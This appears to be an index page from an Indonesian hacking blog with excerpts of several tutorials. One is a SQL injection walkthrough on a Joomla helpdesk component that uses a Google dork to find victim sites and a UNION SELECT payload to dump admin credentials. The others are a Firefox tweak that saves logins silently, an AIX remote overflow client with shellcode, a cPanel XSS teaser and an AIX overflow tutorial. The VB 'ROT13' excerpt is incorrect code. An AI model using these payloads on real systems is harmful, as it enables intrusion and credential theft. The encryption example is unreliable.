Tutorial Hacking Attack With XXS From Control Panel

Cpanel adalah aplikasi pengelolaan hosting yang sangat vital karena dengan aplikasi ini seseorang bisa mengelola semua hal yang terkait dengan hosting antara lain website, email, kunci SSL dan PGP, mysql database, DNS, domain dan masih banyak lagi. Oleh karena itu sangat berbahaya bila account cpanel seseorang berhasil dibajak orang lain. Dalam artikel ini akan saya jelaskan salah satu serangan yang sangat berbahaya, yaitu XSS (Cross Site Scripting) pada File Manager Cpanel, serangan ini menyerang pengguna yang sedang login dalam cpanel, kemudian menjalankan script dengan hak yang sama dengan pemilik account cpanel. Vulnerability ini saya temukan di cpanel versi 11.24.4-CURRENT. Sekilas tentang CPanel File Manager Cpanel terdiri dari berbagai...

Read more »

Hacking Tutorial Dengan Menggunakan Mozilla Firefox

Dengan javascript ini browser kita akan otomatis nge-save semua username & password tanpa ada konfirmasi "Save Password" Intinya adalah menghilangkan notifikasi pop-up simpan pesan pada firefox / flock Langsung ke kita coba: 1. Lihat Versi Firefox , bisa berjalan di versi 3.6 2. Pastikan komputer kita gak ada deepfreeze 3. Msuk k Local disk C: , plih Program Files => Mozilla Firefox => Components.. Cari file yang bernama "Ns Login Manager Prompter.js" Buka Dengan notepad kemudian tambahkan kode berikut : _showSaveLoginNotification : function (aNotifyBox, aLogin) { var pwmgr = this._pwmgr; pwmgr.addLogin(aLogin); }, Ingat kode tersebut ditambahkan diantara script dibawah ini gunakan fitur find pada notepad untuk mempercepat pencarian. Hasilnya...

Read more »

Tutorial Hacking With SQL Injection Pada Joomla

ok langsung saja kita menuju step by step dalam pengerjaannya. ========== [+] step 1 ========== Buka google.. ketik keyword : Code: "inurl:/index.php?option=com_huruhelpdesk\" Atau silahkan ke sini untuk liat Exploitnya Databasenya : Exploit Database Tes satu per satu coba kita ambil yang ini : ========== [+] step 2 ========== Pasang exploit.. /index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users-- Maka akan menghasilkan gambar seperti dibawah ini: Nah kita akan melihat admin nya... :P ========== [+] step 3 ========== Coba kita reset password nya : /index.php?option=com_user&view=reset hmmm... minta email dia.. masukin saja...

Read more »

Tips and Trick Membuat Program Enkripsi Sederhana With VB 6

Ok Kembali Lagi Bersama saya, sekarang saya akan membagi sedikit ilmu mengenai VB [ Visual Basic ] kali ini kita akan membahas mengenai pembuatan Eknripsi sederhana menggunakan Visual Basic 6. Langsung saja pertama-tama Yang harus kita Siapkan adalah : 1. Buat form seperti dibawah ini : 2. isi propertiesnya Seperti dibawah ini : 3. isi scpript dibawah nie : Sub Rot13() For I = 1 To Len(txtTeks) Baca = Asc(Mid(txtTeks, I, 1)) 'Secara matematis C = ROT13(M) Tukar = Chr(Baca + 13) txtHasil = txtHasil & Tukar Next End Sub Sub DeRot13() For I = 1 To Len(txtTeks) Baca = Asc(Mid(txtTeks, I, 1)) 'Ekuivalen dengan M = ROT13(ROT13(M)) Tukar = Chr(Baca - 13) txtHasil = txtHasil & Tukar Next End Sub Private Sub cmdDekrip_Click() txtHasil...

Read more »

AIX Exploit

/* client.c - remote overflow demo * * 2004.06.16 * san@nsfocus.com */ #include #include #include #include #include #include #include #include #include #include #include #include #include // It needs adjust. #define RET 0x2ff22d88; unsigned char sh_Buff[] = "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnel */ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xc0\x01\xff" /* lil r22,0x1ff */ "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */ "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "\x05\x82\x53\xa0"...

Read more »

Tutorial Exploiting AIX (Buffer Overflows)

Author: san (san_at_xfocus.org) --[ 1 - Familiar with PowerPC architecture(32 bit) The PowerPC architecture is a Reduced Instruction Set Computer (RISC) architecture, with over two hundred defined instructions. PowerPC is RISC in that most instructions execute in a single cycle and typically perform a single operation (such as loading storage to a register, or storing a register to memory). PowerPC instructions are of uniform length of 32 bits and there are almost 12 instruction formats, which reflect 5 primary classes of instructions: - branch instructions, - fixed-point instructions, - floating-point instructions, - load and store instructions, - processor control instructions. PowerPC's application-level registers are broken into three...

Read more »